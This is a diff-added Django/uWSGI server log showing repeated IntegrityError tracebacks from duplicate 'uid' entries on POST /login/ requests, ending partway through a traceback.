+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+[pid: 11057|app: 0|req: 764/1002] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:30 2021] POST /login/ => generated 208507 bytes in 157 msecs (HTTP/1.1 500) 6 headers in 187 bytes (2 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+[pid: 11057|app: 0|req: 765/1003] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:32 2021] POST /login/ => generated 208507 bytes in 149 msecs (HTTP/1.1 500) 6 headers in 187 bytes (2 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+[pid: 11057|app: 0|req: 766/1004] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:33 2021] POST /login/ => generated 208507 bytes in 132 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+[pid: 11057|app: 0|req: 767/1005] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:35 2021] POST /login/ => generated 208507 bytes in 106 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 768/1006] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:36 2021] POST /login/ => generated 82 bytes in 6 msecs (HTTP/1.1 200) 5 headers in 165 bytes (2 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.IntegrityError: (1062, "Duplicate entry '123' for key 'uid'")
+[pid: 11057|app: 0|req: 769/1007] 219.228.146.246 () {48 vars in 1028 bytes} [Thu Jan 14 08:36:36 2021] POST /login/ => generated 208507 bytes in 136 msecs (HTTP/1.1 500) 6 headers in 187 bytes (2 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
